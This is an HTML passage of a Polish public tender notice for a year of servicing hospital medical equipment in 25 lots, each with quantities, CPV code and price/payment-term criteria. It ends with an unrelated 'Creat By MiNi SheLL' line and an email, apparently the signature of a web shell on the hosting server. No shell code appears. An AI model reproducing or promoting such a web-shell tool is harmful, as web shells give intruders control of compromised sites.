8.Zgodnie z art. 24 ust.2a Pzp Zamawiający wykluczy z postępowania o udzielenie zamówienia wykonawcę, który w okresie 3 lat przed wszczęciem postępowania, w sposób zawiniony poważnie naruszył obowiązki zawodowe, w szczególności, gdy wykonawca w wyniku zamierzonego działania lub rażącego niedbalstwa nie wykonał lub nienależycie wykonał zamówienie, co zamawiający jest w stanie wykazać za pomocą dowolnych środków dowodowych. Zamawiający nie wykluczy z postępowania o udzielenie zamówienia wykonawcy, który udowodni, że podjął konkretne środki techniczne, organizacyjne i kadrowe, które mają zapobiec zawinionemu i poważnemu naruszaniu obowiązków zawodowych w przyszłości oraz naprawił szkody powstałe w wyniku naruszenia obowiązków zawodowych lub zobowiązał się do ich naprawienia. 
9. W Sekcji II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA oraz w ZAŁĄCZNIKU I INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH pkt 3 dla Części nr od 1 do 25: podano okres w miesiącach: 12. Powinno być ze względu na program: Termin realizacji zamówienia: przez 12 miesiące licząc od daty podpisania umowy. 10. Zamawiający nie przewiduje udzielania zamówień uzupełniających.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Obsługa serwisowa pomp infuzyjnych wolumetrycznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej pomp infuzyjnych wolumetrycznych - 19 sztuk.
2. Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 1 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3. Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Obsługa serwisowa defibrylatorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej defibrylatorów - 9 sztuk.
2. Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 2 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3. Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Obsługa serwisowa defibrylatorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej defibrylatorów - 6 sztuk.
2.	Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 3 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3.	Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Obsługa serwisowa defibrylatorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej defibrylatorów - 2 sztuki.
2. Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 4 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3.	Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Obsługa serwisowa defibrylatora.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej defibrylatora - 1 sztuka.
2.	Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 5 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3.	Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Obsługa serwisowa aparatów do znieczuleń z monitorami anestetycznymi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej aparatów do znieczuleń z monitorami anestetycznymi - 12 sztuk.
2. Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 6 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3.	Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Obsługa serwisowa respiratorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej respiratorów - 7 sztuk.
2.	Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 7 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3.	Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Obsługa serwisowa respiratorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej respiratorów - 9 sztuk.
2.	Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 8 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3.	Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Obsługa serwisowa respiratorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej respiratorów - 3 sztuki.
2.	Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 9 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3.	Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Obsługa serwisowa zestawów do wspomagania oddechu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej zestawów do wspomagania oddechu - 8 sztuk.
2. Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 10 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3. Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Obsługa serwisowa diatermii chirurgicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej diatermii chirurgicznych - 13 sztuk.
2.	Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 11 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3.	Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> Obsługa serwisowa diatermii chirurgicznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej diatermii chirurgicznych - 3 sztuki.
2. Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 12 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3. Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> Obsługa serwisowa sterylizatorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej sterylizatorów - 2 sztuki.
2.	Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 13 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3.	Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> Obsługa serwisowa sterylizatorów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej sterylizatorów - 10 sztuk.
2.	Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 14 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3.	Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> Obsługa serwisowa ultrasonografów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej ultrasonografów - 5 sztuk.
2.	Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 15 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3.	Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> Obsługa serwisowa ultrasonografów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej ultrasonografów - 2 sztuki.
2.	Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 16 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3.	Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> Obsługa serwisowa ultrasonografu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej ultrasonografu - 1 sztuka.
2.	Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 17 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3.	Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> Obsługa serwisowa ultrasonografu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej ultrasonografu - 1 sztuka.
2.	Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 18 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3.	Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 19 <b>NAZWA:</b> Obsługa serwisowa lamp operacyjnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej lamp operacyjnych - 8 sztuk.
2. Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 19 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3. Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 20 <b>NAZWA:</b> Obsługa serwisowa systemu do fototerapii.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej systemu do fototerapii - 1 sztuka.
2.	Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 20 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3.	Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 21 <b>NAZWA:</b> Obsługa serwisowa automatycznych wstrzykiwaczy kontrastu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej automatycznych wstrzykiwaczy kontrastu - 2 sztuki.
2.	Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 21 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3.	Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 22 <b>NAZWA:</b> Obsługa serwisowa automatycznego wstrzykiwacza kontrastu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej automatycznego wstrzykiwacza kontrastu - 1 sztuka.
2.	Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 22 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3.	Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 23 <b>NAZWA:</b> Obsługa serwisowa inkubatorów noworodkowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej inkubatorów noworodkowych - 12 sztuk.
2.	Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 23 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3.	Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 24 <b>NAZWA:</b> Obsługa serwisowa inkubatorów noworodkowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej inkubatorów noworodkowych - 3 sztuki.
2.	Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 24 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3.	Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 25 <b>NAZWA:</b> Obsługa serwisowa aparatury i sprzętu medycznego różnych typów i producentów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi wykonywania obsługi serwisowej aparatury i sprzętu medycznego różnych typów i producentów.
2.	Szczegóły dotyczące zakresu prac serwisowych oraz rodzaju aparatury przedstawione dla Części  nr 25 zawarte są w Opisie przedmiotu zamówienia (Załącznik nr 1 do SIWZ) będącym integralną częścią SIWZ.
3.	Zakres zamówienia obejmuje usługi będące przedmiotem zamówienia przez okres 12 miesięcy od daty podpisania umowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.42.10.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin płatności w dniach - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com